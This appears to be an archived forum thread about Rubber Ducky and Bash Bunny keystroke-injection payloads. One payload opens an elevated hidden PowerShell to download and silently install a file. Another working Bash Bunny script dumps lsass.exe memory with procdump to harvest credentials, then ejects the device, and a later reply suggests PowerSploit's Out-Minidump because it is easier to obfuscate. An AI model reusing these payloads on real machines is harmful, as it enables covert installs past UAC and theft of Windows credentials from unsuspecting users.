Jump to content

Run admin Executable


Soultouche

Recommended Posts

Hi,

There is something i dont understand with the bash bunny... i dont know i feel like its too hard for my brain to understand how it works compared to the Rubber Ducky so i need some help

I have this on a rubber ducky its pretty basic and does what i want: Starting an admin powershell Asking for admin and THEN running my command ( download a file output that file and run it quietly )

 

DELAY 1500
GUI r
DELAY 1000


STRING Powershell -WindowStyle Hidden -Command "Start PowerShell -WindowStyle Hidden -Verb RunAs ""& "(New-Object System.Net.WebClient).DownloadFile('LINKHERE', '$env:temp\g.msi'); Start %temp%\g.msi /qn""


ENTER
DELAY 1000
ALT o
ALT y

 

So How would be the best way to do that without requiring the download because the file will be on the Bash Bunny either inside or on the storage?

THE POWERSHELL HAS TO BE ADMIN or the program wont install correctly.

i cant get to open an admin powershell and then get the drive letter and execute my program all on one line and ask for approval before actually installing the program ( time saver )

 

Thanks Alot

Link to post
Share on other sites

RUN WIN powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''$DRIVE''').Name+'payloads\\$SWITCH_POSITION\s.msi') /qn"

This is exactly what i have to do, but its not working because its not running as admin

Link to post
Share on other sites
  • 2 weeks later...

Here's my working code for running an executable  (procdump) from the bunny within powershell and the saving the dump file to the bunny, given the user has local admin privs to begin with. Note that in the line that runs procdump, the & character occurs at the front of the command. It is a special powershell operator that evaluates the text following the & character as a command and not a powershell object. 

 

LED Y 100

source bunny_helpers.sh

LED B 100
ATTACKMODE HID STORAGE
Q GUI r
Q DELAY 500
Q STRING powershell Start-Process powershell -Verb runAs
Q ENTER
Q DELAY 1000
Q ALT y
Q DELAY 500
Q STRING \$bunny\=\(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
Q DELAY 500
Q ENTER
Q DELAY 500
Q STRING \& \$bunny\\payloads\\$SWITCH_POSITION\\Procdump\\procdump.exe -accepteula -ma lsass.exe \$bunny\\loot\\takeadump\\lsd.dmp
Q ENTER

Q DELAY 200
Q STRING \$driveEject\=New-Object -comObject Shell.Application
Q ENTER
Q DELAY 200
Q STRING \$driveEject.Namespace\(17\).ParseName\(\$bunny\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q DELAY 200

Q STRING exit
Q ENTER
LED FINISH

Link to post
Share on other sites

Trying to follow if there are any escaped double quotes.  Those double quotes will not translate through quack.  You will have to escape them to show up in the quack command.  Remember, while they are being ran from the bunny payload.txt, they are running in bash still.

 

@rottingsun

Check out this script in place of using the procdump.exe so you have more flexibility to obfuscate, if it comes down to it, than what you have with a binary.

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1

As long as you are at or above the access level of the process you are dumping, you can get it.  Run in a high integrity Powershell shell and it will work on any process.

Link to post
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...